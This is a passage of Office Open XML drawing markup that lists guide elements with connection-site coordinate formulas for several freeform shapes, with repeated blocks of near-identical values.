                <a:gd name="connsiteY2-1142" fmla="*/ 5061 h 76558"/>
                <a:gd name="connsiteX3-1143" fmla="*/ 22492 w 44692"/>
                <a:gd name="connsiteY3-1144" fmla="*/ 3291 h 76558"/>
                <a:gd name="connsiteX4-1145" fmla="*/ 25785 w 44692"/>
                <a:gd name="connsiteY4-1146" fmla="*/ 59 h 76558"/>
                <a:gd name="connsiteX5-1147" fmla="*/ 29869 w 44692"/>
                <a:gd name="connsiteY5-1148" fmla="*/ 2340 h 76558"/>
                <a:gd name="connsiteX6-1149" fmla="*/ 35499 w 44692"/>
                <a:gd name="connsiteY6-1150" fmla="*/ 549 h 76558"/>
                <a:gd name="connsiteX7-1151" fmla="*/ 38354 w 44692"/>
                <a:gd name="connsiteY7-1152" fmla="*/ 5435 h 76558"/>
                <a:gd name="connsiteX8-1153" fmla="*/ 42018 w 44692"/>
                <a:gd name="connsiteY8-1154" fmla="*/ 10177 h 76558"/>
                <a:gd name="connsiteX9-1155" fmla="*/ 41854 w 44692"/>
                <a:gd name="connsiteY9-1156" fmla="*/ 15319 h 76558"/>
                <a:gd name="connsiteX10-1157" fmla="*/ 44574 w 44692"/>
                <a:gd name="connsiteY10-1158" fmla="*/ 25280 h 76558"/>
                <a:gd name="connsiteX11-1159" fmla="*/ 38011 w 44692"/>
                <a:gd name="connsiteY11-1160" fmla="*/ 33912 h 76558"/>
                <a:gd name="connsiteX12-1161" fmla="*/ 35431 w 44692"/>
                <a:gd name="connsiteY12-1162" fmla="*/ 37710 h 76558"/>
                <a:gd name="connsiteX13-1163" fmla="*/ 28591 w 44692"/>
                <a:gd name="connsiteY13-1164" fmla="*/ 36674 h 76558"/>
                <a:gd name="connsiteX14-1165" fmla="*/ 23703 w 44692"/>
                <a:gd name="connsiteY14-1166" fmla="*/ 42965 h 76558"/>
                <a:gd name="connsiteX15-1167" fmla="*/ 16516 w 44692"/>
                <a:gd name="connsiteY15-1168" fmla="*/ 39125 h 76558"/>
                <a:gd name="connsiteX16-1169" fmla="*/ 5840 w 44692"/>
                <a:gd name="connsiteY16-1170" fmla="*/ 35331 h 76558"/>
                <a:gd name="connsiteX17-1171" fmla="*/ 1146 w 44692"/>
                <a:gd name="connsiteY17-1172" fmla="*/ 31109 h 76558"/>
                <a:gd name="connsiteX18-1173" fmla="*/ 2149 w 44692"/>
                <a:gd name="connsiteY18-1174" fmla="*/ 25410 h 76558"/>
                <a:gd name="connsiteX19-1175" fmla="*/ 31 w 44692"/>
                <a:gd name="connsiteY19-1176" fmla="*/ 19563 h 76558"/>
                <a:gd name="connsiteX20-1177" fmla="*/ 3899 w 44692"/>
                <a:gd name="connsiteY20-1178" fmla="*/ 14366 h 76558"/>
                <a:gd name="connsiteX21-1179" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-1180" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-1181" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY0-1182" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX1-1183" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY1-1184" fmla="*/ 1923764 h 1923764"/>
                <a:gd name="connsiteX2-1185" fmla="*/ 468403 w 2066053"/>
                <a:gd name="connsiteY2-1186" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX3-1187" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY3-1188" fmla="*/ 1863456 h 1923764"/>
                <a:gd name="connsiteX4-1189" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY4-1190" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX0-1191" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY0-1192" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX1-1193" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY1-1194" fmla="*/ 1698672 h 1923764"/>
                <a:gd name="connsiteX2-1195" fmla="*/ 532789 w 2066053"/>
                <a:gd name="connsiteY2-1196" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX3-1197" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY3-1198" fmla="*/ 1578056 h 1923764"/>
                <a:gd name="connsiteX4-1199" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY4-1200" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX0-1201" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY0-1202" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX1-1203" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY1-1204" fmla="*/ 1417027 h 1923764"/>
                <a:gd name="connsiteX2-1205" fmla="*/ 618121 w 2066053"/>
                <a:gd name="connsiteY2-1206" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX3-1207" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY3-1208" fmla="*/ 1236103 h 1923764"/>
                <a:gd name="connsiteX4-1209" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY4-1210" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX0-1211" fmla="*/ 4729 w 44692"/>
                <a:gd name="connsiteY0-1212" fmla="*/ 26036 h 76558"/>
                <a:gd name="connsiteX1-1213" fmla="*/ 2196 w 44692"/>
                <a:gd name="connsiteY1-1214" fmla="*/ 25239 h 76558"/>
                <a:gd name="connsiteX2-1215" fmla="*/ 6964 w 44692"/>
                <a:gd name="connsiteY2-1216" fmla="*/ 34758 h 76558"/>
                <a:gd name="connsiteX3-1217" fmla="*/ 5856 w 44692"/>
                <a:gd name="connsiteY3-1218" fmla="*/ 35139 h 76558"/>
                <a:gd name="connsiteX4-1219" fmla="*/ 16514 w 44692"/>
                <a:gd name="connsiteY4-1220" fmla="*/ 38949 h 76558"/>
                <a:gd name="connsiteX5-1221" fmla="*/ 15846 w 44692"/>
                <a:gd name="connsiteY5-1222" fmla="*/ 37209 h 76558"/>
                <a:gd name="connsiteX6-1223" fmla="*/ 29814 w 44692"/>
                <a:gd name="connsiteY6-1224" fmla="*/ 39159 h 76558"/>
                <a:gd name="connsiteX7-1225" fmla="*/ 28406 w 44692"/>
                <a:gd name="connsiteY7-1226" fmla="*/ 40718 h 76558"/>
                <a:gd name="connsiteX8-1227" fmla="*/ 34165 w 44692"/>
                <a:gd name="connsiteY8-1228" fmla="*/ 22813 h 76558"/>
                <a:gd name="connsiteX9-1229" fmla="*/ 39698 w 44692"/>
                <a:gd name="connsiteY9-1230" fmla="*/ 33448 h 76558"/>
                <a:gd name="connsiteX10-1231" fmla="*/ 43546 w 44692"/>
                <a:gd name="connsiteY10-1232" fmla="*/ 15563 h 76558"/>
                <a:gd name="connsiteX11-1233" fmla="*/ 42478 w 44692"/>
                <a:gd name="connsiteY11-1234" fmla="*/ 17189 h 76558"/>
                <a:gd name="connsiteX12-1235" fmla="*/ 38360 w 44692"/>
                <a:gd name="connsiteY12-1236" fmla="*/ 5285 h 76558"/>
                <a:gd name="connsiteX13-1237" fmla="*/ 38436 w 44692"/>
                <a:gd name="connsiteY13-1238" fmla="*/ 6549 h 76558"/>
                <a:gd name="connsiteX14-1239" fmla="*/ 29114 w 44692"/>
                <a:gd name="connsiteY14-1240" fmla="*/ 3811 h 76558"/>
                <a:gd name="connsiteX15-1241" fmla="*/ 29856 w 44692"/>
                <a:gd name="connsiteY15-1242" fmla="*/ 2199 h 76558"/>
                <a:gd name="connsiteX16-1243" fmla="*/ 22177 w 44692"/>
                <a:gd name="connsiteY16-1244" fmla="*/ 4579 h 76558"/>
                <a:gd name="connsiteX17-1245" fmla="*/ 22536 w 44692"/>
                <a:gd name="connsiteY17-1246" fmla="*/ 3189 h 76558"/>
                <a:gd name="connsiteX18-1247" fmla="*/ 12134 w 44692"/>
                <a:gd name="connsiteY18-1248" fmla="*/ 2252 h 76558"/>
                <a:gd name="connsiteX19-1249" fmla="*/ 15336 w 44692"/>
                <a:gd name="connsiteY19-1250" fmla="*/ 6399 h 76558"/>
                <a:gd name="connsiteX20-1251" fmla="*/ 4163 w 44692"/>
                <a:gd name="connsiteY20-1252" fmla="*/ 15648 h 76558"/>
                <a:gd name="connsiteX21-1253" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-1254" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-1255" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY0-1256" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX1-1257" fmla="*/ 5469 w 44692"/>
                <a:gd name="connsiteY1-1258" fmla="*/ 3267 h 76558"/>
                <a:gd name="connsiteX2-1259" fmla="*/ 14041 w 44692"/>
                <a:gd name="connsiteY2-1260" fmla="*/ 5061 h 76558"/>
                <a:gd name="connsiteX3-1261" fmla="*/ 22492 w 44692"/>
                <a:gd name="connsiteY3-1262" fmla="*/ 3291 h 76558"/>
                <a:gd name="connsiteX4-1263" fmla="*/ 25785 w 44692"/>
                <a:gd name="connsiteY4-1264" fmla="*/ 59 h 76558"/>
                <a:gd name="connsiteX5-1265" fmla="*/ 29869 w 44692"/>
                <a:gd name="connsiteY5-1266" fmla="*/ 2340 h 76558"/>
                <a:gd name="connsiteX6-1267" fmla="*/ 35499 w 44692"/>
                <a:gd name="connsiteY6-1268" fmla="*/ 549 h 76558"/>
                <a:gd name="connsiteX7-1269" fmla="*/ 38354 w 44692"/>
                <a:gd name="connsiteY7-1270" fmla="*/ 5435 h 76558"/>
                <a:gd name="connsiteX8-1271" fmla="*/ 42018 w 44692"/>
                <a:gd name="connsiteY8-1272" fmla="*/ 10177 h 76558"/>
                <a:gd name="connsiteX9-1273" fmla="*/ 41854 w 44692"/>
                <a:gd name="connsiteY9-1274" fmla="*/ 15319 h 76558"/>
                <a:gd name="connsiteX10-1275" fmla="*/ 44574 w 44692"/>
                <a:gd name="connsiteY10-1276" fmla="*/ 25280 h 76558"/>
                <a:gd name="connsiteX11-1277" fmla="*/ 38011 w 44692"/>
                <a:gd name="connsiteY11-1278" fmla="*/ 33912 h 76558"/>
                <a:gd name="connsiteX12-1279" fmla="*/ 35431 w 44692"/>
                <a:gd name="connsiteY12-1280" fmla="*/ 37710 h 76558"/>
                <a:gd name="connsiteX13-1281" fmla="*/ 28591 w 44692"/>
                <a:gd name="connsiteY13-1282" fmla="*/ 36674 h 76558"/>
                <a:gd name="connsiteX14-1283" fmla="*/ 23703 w 44692"/>
                <a:gd name="connsiteY14-1284" fmla="*/ 42965 h 76558"/>
                <a:gd name="connsiteX15-1285" fmla="*/ 16516 w 44692"/>
                <a:gd name="connsiteY15-1286" fmla="*/ 39125 h 76558"/>
                <a:gd name="connsiteX16-1287" fmla="*/ 5840 w 44692"/>
                <a:gd name="connsiteY16-1288" fmla="*/ 35331 h 76558"/>
                <a:gd name="connsiteX17-1289" fmla="*/ 1146 w 44692"/>
                <a:gd name="connsiteY17-1290" fmla="*/ 31109 h 76558"/>
                <a:gd name="connsiteX18-1291" fmla="*/ 2149 w 44692"/>
                <a:gd name="connsiteY18-1292" fmla="*/ 25410 h 76558"/>
                <a:gd name="connsiteX19-1293" fmla="*/ 31 w 44692"/>
                <a:gd name="connsiteY19-1294" fmla="*/ 19563 h 76558"/>
                <a:gd name="connsiteX20-1295" fmla="*/ 3899 w 44692"/>
                <a:gd name="connsiteY20-1296" fmla="*/ 14366 h 76558"/>
                <a:gd name="connsiteX21-1297" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-1298" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-1299" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY0-1300" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX1-1301" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY1-1302" fmla="*/ 1923764 h 1923764"/>
                <a:gd name="connsiteX2-1303" fmla="*/ 468403 w 2066053"/>
                <a:gd name="connsiteY2-1304" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX3-1305" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY3-1306" fmla="*/ 1863456 h 1923764"/>
                <a:gd name="connsiteX4-1307" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY4-1308" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX0-1309" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY0-1310" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX1-1311" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY1-1312" fmla="*/ 1698672 h 1923764"/>
                <a:gd name="connsiteX2-1313" fmla="*/ 532789 w 2066053"/>
                <a:gd name="connsiteY2-1314" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX3-1315" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY3-1316" fmla="*/ 1578056 h 1923764"/>
                <a:gd name="connsiteX4-1317" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY4-1318" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX0-1319" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY0-1320" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX1-1321" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY1-1322" fmla="*/ 1417027 h 1923764"/>
                <a:gd name="connsiteX2-1323" fmla="*/ 618121 w 2066053"/>
                <a:gd name="connsiteY2-1324" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX3-1325" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY3-1326" fmla="*/ 1236103 h 1923764"/>
                <a:gd name="connsiteX4-1327" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY4-1328" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX0-1329" fmla="*/ 4729 w 44692"/>
                <a:gd name="connsiteY0-1330" fmla="*/ 26036 h 76558"/>
                <a:gd name="connsiteX1-1331" fmla="*/ 2196 w 44692"/>
                <a:gd name="connsiteY1-1332" fmla="*/ 25239 h 76558"/>
                <a:gd name="connsiteX2-1333" fmla="*/ 6964 w 44692"/>
                <a:gd name="connsiteY2-1334" fmla="*/ 34758 h 76558"/>
                <a:gd name="connsiteX3-1335" fmla="*/ 5856 w 44692"/>
                <a:gd name="connsiteY3-1336" fmla="*/ 35139 h 76558"/>
                <a:gd name="connsiteX4-1337" fmla="*/ 16514 w 44692"/>
                <a:gd name="connsiteY4-1338" fmla="*/ 38949 h 76558"/>
                <a:gd name="connsiteX5-1339" fmla="*/ 15846 w 44692"/>
                <a:gd name="connsiteY5-1340" fmla="*/ 37209 h 76558"/>
                <a:gd name="connsiteX6-1341" fmla="*/ 29814 w 44692"/>
                <a:gd name="connsiteY6-1342" fmla="*/ 39159 h 76558"/>
                <a:gd name="connsiteX7-1343" fmla="*/ 28406 w 44692"/>
                <a:gd name="connsiteY7-1344" fmla="*/ 40718 h 76558"/>
                <a:gd name="connsiteX8-1345" fmla="*/ 34165 w 44692"/>
                <a:gd name="connsiteY8-1346" fmla="*/ 22813 h 76558"/>
                <a:gd name="connsiteX9-1347" fmla="*/ 39698 w 44692"/>
                <a:gd name="connsiteY9-1348" fmla="*/ 33448 h 76558"/>
                <a:gd name="connsiteX10-1349" fmla="*/ 43546 w 44692"/>
                <a:gd name="connsiteY10-1350" fmla="*/ 15563 h 76558"/>
                <a:gd name="connsiteX11-1351" fmla="*/ 42478 w 44692"/>
                <a:gd name="connsiteY11-1352" fmla="*/ 17189 h 76558"/>
                <a:gd name="connsiteX12-1353" fmla="*/ 38360 w 44692"/>
                <a:gd name="connsiteY12-1354" fmla="*/ 5285 h 76558"/>
                <a:gd name="connsiteX13-1355" fmla="*/ 38436 w 44692"/>
                <a:gd name="connsiteY13-1356" fmla="*/ 6549 h 76558"/>
                <a:gd name="connsiteX14-1357" fmla="*/ 29114 w 44692"/>
                <a:gd name="connsiteY14-1358" fmla="*/ 3811 h 76558"/>
                <a:gd name="connsiteX15-1359" fmla="*/ 29856 w 44692"/>
                <a:gd name="connsiteY15-1360" fmla="*/ 2199 h 76558"/>
                <a:gd name="connsiteX16-1361" fmla="*/ 22177 w 44692"/>
                <a:gd name="connsiteY16-1362" fmla="*/ 4579 h 76558"/>
                <a:gd name="connsiteX17-1363" fmla="*/ 22536 w 44692"/>
                <a:gd name="connsiteY17-1364" fmla="*/ 3189 h 76558"/>
                <a:gd name="connsiteX18-1365" fmla="*/ 12134 w 44692"/>
                <a:gd name="connsiteY18-1366" fmla="*/ 2252 h 76558"/>
                <a:gd name="connsiteX19-1367" fmla="*/ 14956 w 44692"/>
                <a:gd name="connsiteY19-1368" fmla="*/ 3600 h 76558"/>
                <a:gd name="connsiteX20-1369" fmla="*/ 4163 w 44692"/>
                <a:gd name="connsiteY20-1370" fmla="*/ 15648 h 76558"/>
                <a:gd name="connsiteX21-1371" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-1372" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-1373" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY0-1374" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX1-1375" fmla="*/ 5469 w 44692"/>
                <a:gd name="connsiteY1-1376" fmla="*/ 3267 h 76558"/>
                <a:gd name="connsiteX2-1377" fmla="*/ 14041 w 44692"/>
                <a:gd name="connsiteY2-1378" fmla="*/ 5061 h 76558"/>
                <a:gd name="connsiteX3-1379" fmla="*/ 22492 w 44692"/>
                <a:gd name="connsiteY3-1380" fmla="*/ 3291 h 76558"/>
                <a:gd name="connsiteX4-1381" fmla="*/ 25785 w 44692"/>
                <a:gd name="connsiteY4-1382" fmla="*/ 59 h 76558"/>
                <a:gd name="connsiteX5-1383" fmla="*/ 29869 w 44692"/>
                <a:gd name="connsiteY5-1384" fmla="*/ 2340 h 76558"/>
                <a:gd name="connsiteX6-1385" fmla="*/ 35499 w 44692"/>
                <a:gd name="connsiteY6-1386" fmla="*/ 549 h 76558"/>
                <a:gd name="connsiteX7-1387" fmla="*/ 38354 w 44692"/>
                <a:gd name="connsiteY7-1388" fmla="*/ 5435 h 76558"/>
                <a:gd name="connsiteX8-1389" fmla="*/ 42018 w 44692"/>
                <a:gd name="connsiteY8-1390" fmla="*/ 10177 h 76558"/>
                <a:gd name="connsiteX9-1391" fmla="*/ 41854 w 44692"/>
                <a:gd name="connsiteY9-1392" fmla="*/ 15319 h 76558"/>
                <a:gd name="connsiteX10-1393" fmla="*/ 44574 w 44692"/>
                <a:gd name="connsiteY10-1394" fmla="*/ 25280 h 76558"/>
                <a:gd name="connsiteX11-1395" fmla="*/ 38011 w 44692"/>
                <a:gd name="connsiteY11-1396" fmla="*/ 33912 h 76558"/>
                <a:gd name="connsiteX12-1397" fmla="*/ 35431 w 44692"/>
                <a:gd name="connsiteY12-1398" fmla="*/ 37710 h 76558"/>
                <a:gd name="connsiteX13-1399" fmla="*/ 28591 w 44692"/>
                <a:gd name="connsiteY13-1400" fmla="*/ 36674 h 76558"/>
                <a:gd name="connsiteX14-1401" fmla="*/ 23703 w 44692"/>
                <a:gd name="connsiteY14-1402" fmla="*/ 42965 h 76558"/>
                <a:gd name="connsiteX15-1403" fmla="*/ 16516 w 44692"/>
                <a:gd name="connsiteY15-1404" fmla="*/ 39125 h 76558"/>
                <a:gd name="connsiteX16-1405" fmla="*/ 5840 w 44692"/>
                <a:gd name="connsiteY16-1406" fmla="*/ 35331 h 76558"/>
                <a:gd name="connsiteX17-1407" fmla="*/ 1146 w 44692"/>
                <a:gd name="connsiteY17-1408" fmla="*/ 31109 h 76558"/>
                <a:gd name="connsiteX18-1409" fmla="*/ 2149 w 44692"/>
                <a:gd name="connsiteY18-1410" fmla="*/ 25410 h 76558"/>
                <a:gd name="connsiteX19-1411" fmla="*/ 31 w 44692"/>
                <a:gd name="connsiteY19-1412" fmla="*/ 19563 h 76558"/>
                <a:gd name="connsiteX20-1413" fmla="*/ 3899 w 44692"/>
                <a:gd name="connsiteY20-1414" fmla="*/ 14366 h 76558"/>
                <a:gd name="connsiteX21-1415" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-1416" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-1417" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY0-1418" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX1-1419" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY1-1420" fmla="*/ 1923764 h 1923764"/>
                <a:gd name="connsiteX2-1421" fmla="*/ 468403 w 2066053"/>
                <a:gd name="connsiteY2-1422" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX3-1423" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY3-1424" fmla="*/ 1863456 h 1923764"/>
                <a:gd name="connsiteX4-1425" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY4-1426" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX0-1427" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY0-1428" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX1-1429" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY1-1430" fmla="*/ 1698672 h 1923764"/>
                <a:gd name="connsiteX2-1431" fmla="*/ 532789 w 2066053"/>
                <a:gd name="connsiteY2-1432" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX3-1433" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY3-1434" fmla="*/ 1578056 h 1923764"/>
                <a:gd name="connsiteX4-1435" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY4-1436" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX0-1437" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY0-1438" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX1-1439" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY1-1440" fmla="*/ 1417027 h 1923764"/>
                <a:gd name="connsiteX2-1441" fmla="*/ 618121 w 2066053"/>
                <a:gd name="connsiteY2-1442" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX3-1443" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY3-1444" fmla="*/ 1236103 h 1923764"/>
                <a:gd name="connsiteX4-1445" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY4-1446" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX0-1447" fmla="*/ 4729 w 44692"/>
                <a:gd name="connsiteY0-1448" fmla="*/ 26036 h 76558"/>
                <a:gd name="connsiteX1-1449" fmla="*/ 2196 w 44692"/>
                <a:gd name="connsiteY1-1450" fmla="*/ 25239 h 76558"/>
                <a:gd name="connsiteX2-1451" fmla="*/ 6964 w 44692"/>
                <a:gd name="connsiteY2-1452" fmla="*/ 34758 h 76558"/>
                <a:gd name="connsiteX3-1453" fmla="*/ 5856 w 44692"/>
                <a:gd name="connsiteY3-1454" fmla="*/ 35139 h 76558"/>
                <a:gd name="connsiteX4-1455" fmla="*/ 16514 w 44692"/>
                <a:gd name="connsiteY4-1456" fmla="*/ 38949 h 76558"/>
                <a:gd name="connsiteX5-1457" fmla="*/ 15846 w 44692"/>
                <a:gd name="connsiteY5-1458" fmla="*/ 37209 h 76558"/>
                <a:gd name="connsiteX6-1459" fmla="*/ 29814 w 44692"/>
                <a:gd name="connsiteY6-1460" fmla="*/ 39159 h 76558"/>
                <a:gd name="connsiteX7-1461" fmla="*/ 28406 w 44692"/>
                <a:gd name="connsiteY7-1462" fmla="*/ 40718 h 76558"/>
                <a:gd name="connsiteX8-1463" fmla="*/ 34165 w 44692"/>
                <a:gd name="connsiteY8-1464" fmla="*/ 22813 h 76558"/>
                <a:gd name="connsiteX9-1465" fmla="*/ 39698 w 44692"/>
                <a:gd name="connsiteY9-1466" fmla="*/ 33448 h 76558"/>
                <a:gd name="connsiteX10-1467" fmla="*/ 43546 w 44692"/>
                <a:gd name="connsiteY10-1468" fmla="*/ 15563 h 76558"/>
                <a:gd name="connsiteX11-1469" fmla="*/ 42478 w 44692"/>
                <a:gd name="connsiteY11-1470" fmla="*/ 17189 h 76558"/>
                <a:gd name="connsiteX12-1471" fmla="*/ 38360 w 44692"/>
                <a:gd name="connsiteY12-1472" fmla="*/ 5285 h 76558"/>
                <a:gd name="connsiteX13-1473" fmla="*/ 38436 w 44692"/>
                <a:gd name="connsiteY13-1474" fmla="*/ 6549 h 76558"/>
                <a:gd name="connsiteX14-1475" fmla="*/ 29114 w 44692"/>
                <a:gd name="connsiteY14-1476" fmla="*/ 3811 h 76558"/>
                <a:gd name="connsiteX15-1477" fmla="*/ 29856 w 44692"/>
                <a:gd name="connsiteY15-1478" fmla="*/ 2199 h 76558"/>
                <a:gd name="connsiteX16-1479" fmla="*/ 22177 w 44692"/>
                <a:gd name="connsiteY16-1480" fmla="*/ 4579 h 76558"/>
                <a:gd name="connsiteX17-1481" fmla="*/ 22536 w 44692"/>
                <a:gd name="connsiteY17-1482" fmla="*/ 3189 h 76558"/>
                <a:gd name="connsiteX18-1483" fmla="*/ 12134 w 44692"/>
                <a:gd name="connsiteY18-1484" fmla="*/ 2252 h 76558"/>
                <a:gd name="connsiteX19-1485" fmla="*/ 13815 w 44692"/>
                <a:gd name="connsiteY19-1486" fmla="*/ 1151 h 76558"/>
                <a:gd name="connsiteX20-1487" fmla="*/ 4163 w 44692"/>
                <a:gd name="connsiteY20-1488" fmla="*/ 15648 h 76558"/>
                <a:gd name="connsiteX21-1489" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-1490" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-1491" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY0-1492" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX1-1493" fmla="*/ 5469 w 44692"/>
                <a:gd name="connsiteY1-1494" fmla="*/ 3267 h 76558"/>
                <a:gd name="connsiteX2-1495" fmla="*/ 13851 w 44692"/>
                <a:gd name="connsiteY2-1496" fmla="*/ 2612 h 76558"/>
                <a:gd name="connsiteX3-1497" fmla="*/ 22492 w 44692"/>
                <a:gd name="connsiteY3-1498" fmla="*/ 3291 h 76558"/>
                <a:gd name="connsiteX4-1499" fmla="*/ 25785 w 44692"/>
                <a:gd name="connsiteY4-1500" fmla="*/ 59 h 76558"/>
                <a:gd name="connsiteX5-1501" fmla="*/ 29869 w 44692"/>
                <a:gd name="connsiteY5-1502" fmla="*/ 2340 h 76558"/>
                <a:gd name="connsiteX6-1503" fmla="*/ 35499 w 44692"/>
                <a:gd name="connsiteY6-1504" fmla="*/ 549 h 76558"/>
                <a:gd name="connsiteX7-1505" fmla="*/ 38354 w 44692"/>
                <a:gd name="connsiteY7-1506" fmla="*/ 5435 h 76558"/>
                <a:gd name="connsiteX8-1507" fmla="*/ 42018 w 44692"/>
                <a:gd name="connsiteY8-1508" fmla="*/ 10177 h 76558"/>
                <a:gd name="connsiteX9-1509" fmla="*/ 41854 w 44692"/>
                <a:gd name="connsiteY9-1510" fmla="*/ 15319 h 76558"/>
                <a:gd name="connsiteX10-1511" fmla="*/ 44574 w 44692"/>
                <a:gd name="connsiteY10-1512" fmla="*/ 25280 h 76558"/>
                <a:gd name="connsiteX11-1513" fmla="*/ 38011 w 44692"/>
                <a:gd name="connsiteY11-1514" fmla="*/ 33912 h 76558"/>
                <a:gd name="connsiteX12-1515" fmla="*/ 35431 w 44692"/>
                <a:gd name="connsiteY12-1516" fmla="*/ 37710 h 76558"/>
                <a:gd name="connsiteX13-1517" fmla="*/ 28591 w 44692"/>
                <a:gd name="connsiteY13-1518" fmla="*/ 36674 h 76558"/>
                <a:gd name="connsiteX14-1519" fmla="*/ 23703 w 44692"/>
                <a:gd name="connsiteY14-1520" fmla="*/ 42965 h 76558"/>
                <a:gd name="connsiteX15-1521" fmla="*/ 16516 w 44692"/>
                <a:gd name="connsiteY15-1522" fmla="*/ 39125 h 76558"/>
                <a:gd name="connsiteX16-1523" fmla="*/ 5840 w 44692"/>
                <a:gd name="connsiteY16-1524" fmla="*/ 35331 h 76558"/>
                <a:gd name="connsiteX17-1525" fmla="*/ 1146 w 44692"/>
                <a:gd name="connsiteY17-1526" fmla="*/ 31109 h 76558"/>
                <a:gd name="connsiteX18-1527" fmla="*/ 2149 w 44692"/>
                <a:gd name="connsiteY18-1528" fmla="*/ 25410 h 76558"/>
                <a:gd name="connsiteX19-1529" fmla="*/ 31 w 44692"/>
                <a:gd name="connsiteY19-1530" fmla="*/ 19563 h 76558"/>
                <a:gd name="connsiteX20-1531" fmla="*/ 3899 w 44692"/>
                <a:gd name="connsiteY20-1532" fmla="*/ 14366 h 76558"/>
                <a:gd name="connsiteX21-1533" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-1534" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-1535" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY0-1536" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX1-1537" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY1-1538" fmla="*/ 1923764 h 1923764"/>
                <a:gd name="connsiteX2-1539" fmla="*/ 468403 w 2066053"/>
                <a:gd name="connsiteY2-1540" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX3-1541" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY3-1542" fmla="*/ 1863456 h 1923764"/>
